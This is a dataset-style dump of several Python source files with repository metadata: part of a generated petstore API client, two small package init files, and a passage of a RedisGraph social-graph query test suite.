kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['status'] = \
status
return self.call_with_http_info(**kwargs)
self.find_pets_by_status = Endpoint(
settings={
'response_type': ([pet.Pet],),
'auth': [
'http_signature_test',
'petstore_auth'
],
'endpoint_path': '/pet/findByStatus',
'operation_id': 'find_pets_by_status',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'status',
],
'required': [
'status',
],
'nullable': [
],
'enum': [
'status',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('status',): {
"AVAILABLE": "available",
"PENDING": "pending",
"SOLD": "sold"
},
},
'openapi_types': {
'status':
([str],),
},
'attribute_map': {
'status': 'status',
},
'location_map': {
'status': 'query',
},
'collection_format_map': {
'status': 'csv',
}
},
headers_map={
'accept': [
'application/xml',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__find_pets_by_status
)
def __find_pets_by_tags(
self,
tags,
**kwargs
):
"""Finds Pets by tags # noqa: E501
Multiple tags can be provided with comma separated strings. Use tag1, tag2, tag3 for testing. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_pets_by_tags(tags, async_req=True)
>>> result = thread.get()
Args:
tags ([str]): Tags to filter by
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[pet.Pet]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tags'] = \
tags
return self.call_with_http_info(**kwargs)
self.find_pets_by_tags = Endpoint(
settings={
'response_type': ([pet.Pet],),
'auth': [
'http_signature_test',
'petstore_auth'
],
'endpoint_path': '/pet/findByTags',
'operation_id': 'find_pets_by_tags',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'tags',
],
'required': [
'tags',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'tags':
([str],),
},
'attribute_map': {
'tags': 'tags',
},
'location_map': {
'tags': 'query',
},
'collection_format_map': {
'tags': 'csv',
}
},
headers_map={
'accept': [
'application/xml',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__find_pets_by_tags
)
def __get_pet_by_id(
self,
pet_id,
**kwargs
):
"""Find pet by ID # noqa: E501
Returns a single pet # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_pet_by_id(pet_id, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): ID of pet to return
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
pet.Pet
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
return self.call_with_http_info(**kwargs)
self.get_pet_by_id = Endpoint(
settings={
'response_type': (pet.Pet,),
'auth': [
'api_key'
],
'endpoint_path': '/pet/{petId}',
'operation_id': 'get_pet_by_id',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'pet_id',
],
'required': [
'pet_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
},
'attribute_map': {
'pet_id': 'petId',
},
'location_map': {
'pet_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/xml',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_pet_by_id
)
def __update_pet(
self,
pet_pet,
**kwargs
):
"""Update an existing pet # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_pet(pet_pet, async_req=True)
>>> result = thread.get()
Args:
pet_pet (pet.Pet): Pet object that needs to be added to the store
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_pet'] = \
pet_pet
return self.call_with_http_info(**kwargs)
self.update_pet = Endpoint(
settings={
'response_type': None,
'auth': [
'http_signature_test',
'petstore_auth'
],
'endpoint_path': '/pet',
'operation_id': 'update_pet',
'http_method': 'PUT',
'servers': [
{
'url': "http://petstore.swagger.io/v2",
'description': "No description provided",
},
{
'url': "http://path-server-test.petstore.local/v2",
'description': "No description provided",
},
]
},
params_map={
'all': [
'pet_pet',
],
'required': [
'pet_pet',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_pet':
(pet.Pet,),
},
'attribute_map': {
},
'location_map': {
'pet_pet': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client,
callable=__update_pet
)
def __update_pet_with_form(
self,
pet_id,
**kwargs
):
"""Updates a pet in the store with form data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_pet_with_form(pet_id, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): ID of pet that needs to be updated
Keyword Args:
name (str): Updated name of the pet. [optional]
status (str): Updated status of the pet. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
return self.call_with_http_info(**kwargs)
self.update_pet_with_form = Endpoint(
settings={
'response_type': None,
'auth': [
'petstore_auth'
],
'endpoint_path': '/pet/{petId}',
'operation_id': 'update_pet_with_form',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'pet_id',
'name',
'status',
],
'required': [
'pet_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
'name':
(str,),
'status':
(str,),
},
'attribute_map': {
'pet_id': 'petId',
'name': 'name',
'status': 'status',
},
'location_map': {
'pet_id': 'path',
'name': 'form',
'status': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/x-www-form-urlencoded'
]
},
api_client=api_client,
callable=__update_pet_with_form
)
def __upload_file(
self,
pet_id,
**kwargs
):
"""uploads an image # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_file(pet_id, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): ID of pet to update
Keyword Args:
additional_metadata (str): Additional data to pass to server. [optional]
file (file_type): file to upload. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
api_response.ApiResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
return self.call_with_http_info(**kwargs)
self.upload_file = Endpoint(
settings={
'response_type': (api_response.ApiResponse,),
'auth': [
'petstore_auth'
],
'endpoint_path': '/pet/{petId}/uploadImage',
'operation_id': 'upload_file',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'pet_id',
'additional_metadata',
'file',
],
'required': [
'pet_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
'additional_metadata':
(str,),
'file':
(file_type,),
},
'attribute_map': {
'pet_id': 'petId',
'additional_metadata': 'additionalMetadata',
'file': 'file',
},
'location_map': {
'pet_id': 'path',
'additional_metadata': 'form',
'file': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client,
callable=__upload_file
)
def __upload_file_with_required_file(
self,
pet_id,
required_file,
**kwargs
):
"""uploads an image (required) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_file_with_required_file(pet_id, required_file, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): ID of pet to update
required_file (file_type): file to upload
Keyword Args:
additional_metadata (str): Additional data to pass to server. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
api_response.ApiResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
kwargs['required_file'] = \
required_file
return self.call_with_http_info(**kwargs)
self.upload_file_with_required_file = Endpoint(
settings={
'response_type': (api_response.ApiResponse,),
'auth': [
'petstore_auth'
],
'endpoint_path': '/fake/{petId}/uploadImageWithRequiredFile',
'operation_id': 'upload_file_with_required_file',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'pet_id',
'required_file',
'additional_metadata',
],
'required': [
'pet_id',
'required_file',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
'required_file':
(file_type,),
'additional_metadata':
(str,),
},
'attribute_map': {
'pet_id': 'petId',
'required_file': 'requiredFile',
'additional_metadata': 'additionalMetadata',
},
'location_map': {
'pet_id': 'path',
'required_file': 'form',
'additional_metadata': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client,
callable=__upload_file_with_required_file
)
| 35.712121 | 174 | 0.44204 | 3,636 | 42,426 | 4.902915 | 0.066557 | 0.031806 | 0.026252 | 0.027262 | 0.864475 | 0.843832 | 0.832894 | 0.815617 | 0.806249 | 0.803052 | 0 | 0.00305 | 0.474497 | 42,426 | 1,187 | 175 | 35.742207 | 0.796546 | 0.323174 | 0 | 0.655473 | 0 | 0 | 0.223733 | 0.028354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012438 | false | 0 | 0.007463 | 0 | 0.032338 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a544b6b024c9eafcbcf82cbbd577738162c02ca | 33 | py | Python | qa_query/whoosh_utils/__init__.py | scollins83/qa_query | 63240ec8e6d34a0bbdfc199aae0631cc35fac4e0 | [
"MIT"
] | 6 | 2019-09-08T02:38:38.000Z | 2020-05-19T23:31:40.000Z | qa_query/whoosh_utils/__init__.py | scollins83/qa_query | 63240ec8e6d34a0bbdfc199aae0631cc35fac4e0 | [
"MIT"
] | 1 | 2019-09-09T11:20:38.000Z | 2019-09-09T11:20:38.000Z | qa_query/whoosh_utils/__init__.py | scollins83/qa_query | 63240ec8e6d34a0bbdfc199aae0631cc35fac4e0 | [
"MIT"
] | 14 | 2019-09-08T00:42:54.000Z | 2021-04-06T15:18:18.000Z | from .analysis import QAAnalyzer
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a55c2f3b1d6489d9bf0456794c75c5b03744e91 | 150 | py | Python | tunetools/__init__.py | Keytoyze/TuneTools | 71b45f5b061d7fccc36e25297811647bdb1e5fe8 | [
"MIT"
] | 1 | 2021-07-19T05:52:06.000Z | 2021-07-19T05:52:06.000Z | tunetools/__init__.py | Keytoyze/TuneTools | 71b45f5b061d7fccc36e25297811647bdb1e5fe8 | [
"MIT"
] | null | null | null | tunetools/__init__.py | Keytoyze/TuneTools | 71b45f5b061d7fccc36e25297811647bdb1e5fe8 | [
"MIT"
] | null | null | null | from .core import *
from .search_space import *
from .search_types import *
from .config import *
from .package_info import *
from .main import main
| 18.75 | 27 | 0.76 | 22 | 150 | 5.045455 | 0.454545 | 0.45045 | 0.288288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 150 | 7 | 28 | 21.428571 | 0.888 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
6a5a9ba67d2febb288b4fc0434dca9e8d4274a7c | 18,530 | py | Python | tests/flow/test_social.py | ushachar/RedisGraph | b14b7a5afd1d5ab8c964a9c3da5e322a2b7d694d | [
"Ruby",
"ISC",
"MIT"
] | null | null | null | tests/flow/test_social.py | ushachar/RedisGraph | b14b7a5afd1d5ab8c964a9c3da5e322a2b7d694d | [
"Ruby",
"ISC",
"MIT"
] | null | null | null | tests/flow/test_social.py | ushachar/RedisGraph | b14b7a5afd1d5ab8c964a9c3da5e322a2b7d694d | [
"Ruby",
"ISC",
"MIT"
] | null | null | null | import os
import sys
from redisgraph import Graph
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '/../../demo/social/')
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from reversepattern import ReversePattern
from base import FlowTestsBase
import social_queries as queries
import social_utils
redis_graph = None
class testSocialFlow(FlowTestsBase):
def __init__(self):
super(testSocialFlow, self).__init__()
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(social_utils.graph_name, redis_con)
social_utils.populate_graph(redis_con, redis_graph)
def assert_reversed_pattern(self, query, resultset):
# Test reversed pattern query.
reversed_query = ReversePattern().reverse_query_pattern(query)
# print "reversed_query: %s" % reversed_query
actual_result = redis_graph.query(reversed_query)
# assert result set
self.env.assertEqual(resultset.result_set, actual_result.result_set)
# assert query run time
self._assert_equalish(resultset.run_time_ms, actual_result.run_time_ms)
def test00_graph_entities(self):
global redis_graph
q = queries.graph_entities.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.graph_entities)
# assert query run time
self._assert_run_time(actual_result, queries.graph_entities)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test01_relation_type_strings(self):
global redis_graph
q = queries.relation_type_counts.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.relation_type_counts)
# assert query run time
self._assert_run_time(actual_result, queries.relation_type_counts)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test02_subset_of_people(self):
global redis_graph
q = queries.subset_of_people.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.subset_of_people)
# assert query run time
self._assert_run_time(actual_result, queries.subset_of_people)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test03_my_friends(self):
global redis_graph
q = queries.my_friends_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.my_friends_query)
# assert query run time
self._assert_run_time(actual_result, queries.my_friends_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test04_friends_of_friends(self):
global redis_graph
q = queries.friends_of_friends_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_of_friends_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_of_friends_query)
runtime = actual_result.run_time_ms
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test05_friends_of_friends_single_and_over_30(self):
global redis_graph
q = queries.friends_of_friends_single_and_over_30_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_of_friends_single_and_over_30_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_of_friends_single_and_over_30_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test06_friends_of_friends_visited_netherlands_and_single(self):
global redis_graph
q = queries.friends_of_friends_visited_netherlands_and_single_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_of_friends_visited_netherlands_and_single_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_of_friends_visited_netherlands_and_single_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test07_friends_visited_same_places_as_me(self):
global redis_graph
q = queries.friends_visited_same_places_as_me_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_visited_same_places_as_me_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_visited_same_places_as_me_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test08_countries_visited_by_roi_tal_boaz(self):
global redis_graph
q = queries.countries_visited_by_roi_tal_boaz.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.countries_visited_by_roi_tal_boaz)
# assert query run time
self._assert_run_time(actual_result, queries.countries_visited_by_roi_tal_boaz)
def test09_friends_older_than_me(self):
global redis_graph
q = queries.friends_older_than_me_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_older_than_me_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_older_than_me_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test10_friends_age_difference_query(self):
global redis_graph
q = queries.friends_age_difference_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_age_difference_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_age_difference_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test11_friends_who_are_older_than_average(self):
global redis_graph
q = queries.friends_who_are_older_than_average.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_who_are_older_than_average)
# assert query run time
self._assert_run_time(actual_result, queries.friends_who_are_older_than_average)
def test12_how_many_countries_each_friend_visited(self):
global redis_graph
q = queries.how_many_countries_each_friend_visited_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.how_many_countries_each_friend_visited_query)
# assert query run time
self._assert_run_time(actual_result, queries.how_many_countries_each_friend_visited_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test13_visit_purpose_of_each_country_i_visited(self):
global redis_graph
q = queries.visit_purpose_of_each_country_i_visited_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.visit_purpose_of_each_country_i_visited_query)
# assert query run time
self._assert_run_time(actual_result, queries.visit_purpose_of_each_country_i_visited_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test14_who_was_on_business_trip(self):
global redis_graph
q = queries.who_was_on_business_trip_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.who_was_on_business_trip_query)
# assert query run time
self._assert_run_time(actual_result, queries.who_was_on_business_trip_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test15_number_of_vacations_per_person(self):
global redis_graph
NUM_EXPECTED_RESULTS = 6
q = queries.number_of_vacations_per_person_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_actual_results_contained_in_expected_results(
actual_result,
queries.number_of_vacations_per_person_query,
NUM_EXPECTED_RESULTS)
# assert query run time
self._assert_run_time(actual_result, queries.number_of_vacations_per_person_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test16_all_reachable_friends_query(self):
global redis_graph
q = queries.all_reachable_friends_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_friends_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_friends_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test17_all_reachable_countries_query(self):
global redis_graph
q = queries.all_reachable_countries_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_countries_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_countries_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test18_reachable_countries_or_people_query(self):
global redis_graph
q = queries.reachable_countries_or_people_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.reachable_countries_or_people_query)
# assert query run time
self._assert_run_time(actual_result, queries.reachable_countries_or_people_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test19_all_reachable_countries_or_people_query(self):
global redis_graph
q = queries.all_reachable_countries_or_people_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_countries_or_people_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_countries_or_people_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test20_all_reachable_entities_query(self):
global redis_graph
q = queries.all_reachable_entities_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_entities_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_entities_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test21_all_reachable_people_min_2_hops_query(self):
global redis_graph
q = queries.all_reachable_people_min_2_hops_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_reachable_people_min_2_hops_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_reachable_people_min_2_hops_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test22_happy_birthday(self):
global redis_graph
q = queries.happy_birthday_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.happy_birthday_query)
# assert query run time
self._assert_run_time(actual_result, queries.happy_birthday_query)
def test23_friends_age_statistics(self):
global redis_graph
q = queries.friends_age_statistics_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.friends_age_statistics_query)
# assert query run time
self._assert_run_time(actual_result, queries.friends_age_statistics_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test24_all_paths_leads_to_greece_query(self):
global redis_graph
q = queries.all_paths_leads_to_greece_query.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.all_paths_leads_to_greece_query)
# assert query run time
self._assert_run_time(actual_result, queries.all_paths_leads_to_greece_query)
# assert reversed pattern.
self.assert_reversed_pattern(q, actual_result)
def test25_number_of_paths_to_places_visited(self):
global redis_graph
q = queries.number_of_paths_to_places_visited.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.number_of_paths_to_places_visited)
# assert query run time
self._assert_run_time(actual_result, queries.number_of_paths_to_places_visited)
def test26_pagerank_friends(self):
global redis_graph
q = queries.pagerank_friends.query
actual_result = redis_graph.query(q)
# assert result set
self._assert_only_expected_results_are_in_actual_results(
actual_result,
queries.pagerank_friends)
# assert query run time
self._assert_run_time(actual_result, queries.pagerank_friends)
def test27_edge_counting(self):
global redis_graph
aggregations = [
"match (a:person)-[e]->(b) return a.name, count(e) ORDER BY a.name", # Number of outgoing edges.
"match (a)-[e]->(b:person) return b.name, count(e) ORDER BY b.name", # Number of incoming edges.
"match (a)-[e:friend]->(b) return a.name, count(e) ORDER BY a.name", # Number of typed outgoing edges.
"match (a)-[e:friend]->(b) return b.name, count(e) ORDER BY b.name" # Number of typed incoming edges.
]
none_aggregation = [
